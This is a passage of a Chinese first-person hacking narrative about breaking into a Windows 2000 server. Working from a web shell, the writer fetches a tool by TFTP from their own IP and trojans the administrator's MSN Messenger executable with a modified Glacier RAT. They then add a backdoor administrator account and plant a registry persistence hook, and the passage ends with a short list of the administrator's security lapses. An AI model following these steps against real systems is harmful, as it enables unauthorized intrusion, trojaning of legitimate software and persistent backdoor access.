运行呢一下命令,OK,得到呢一个WEB
SHELL。本来想用NC的反弹连接呢,可是上传后DIR一看没有,估计是被杀毒软件给KILL呢接着就TFTP
-I IP GET
IDQ.DLL拉,然后COPY到SCRIPTS目录下(这是管理员的失误,目录的权限没有设置好)
用ISPC连一下显示成功,本来以为GAME OVER呢,NET USER MM MM
/ADD一看,拒绝访问。权限不够,怎么办呢,就想到呢替换服务器上的开机自启动程序或者服务。查看呢一下系统的服务,发现没有什么好利用的[权限问题],然后上传呢一个REG
查询:
reg query
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
拒绝访问。
好象没有办法呢,又在网上找呢些提升2K[SP4]权限的东东,没有找到。准备放手呢,无聊的在硬盘上用DIR看一些目录。忽然发现呢一个有趣的目录D:\Program
Files\MSN
Messenger\msnmsgr.exe,哈哈,管理员还有这爱好在服务器上用MSN.先看看有没有写的权限,GOOD,有,可以在这个msnmsgr.exe上动手脚呢。把MSNCOPY到WEB目录下载到本地,用我改造过的冰河和它打包一下再上传。等待管理员用MSN把^_^
几天后用我的冰河客户端一连:OK,GAME OVER
先CA,在用VBS留个帐号不死的后门把net user guest *** /add net
localgroup administrators /add
~~~在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command
Processor 把VBS的目录导入
对这次入侵的总结:
1:目录的权限设置不好
2:没有把FSO改名或者DEL
3:没有进行端口过滤或者防火墙
4:服务器上最好不要用一些非必须的软件比如MSN/QQ
5:系统的补丁是最新的呢,还要保证服务器上的其它应用软件是最新的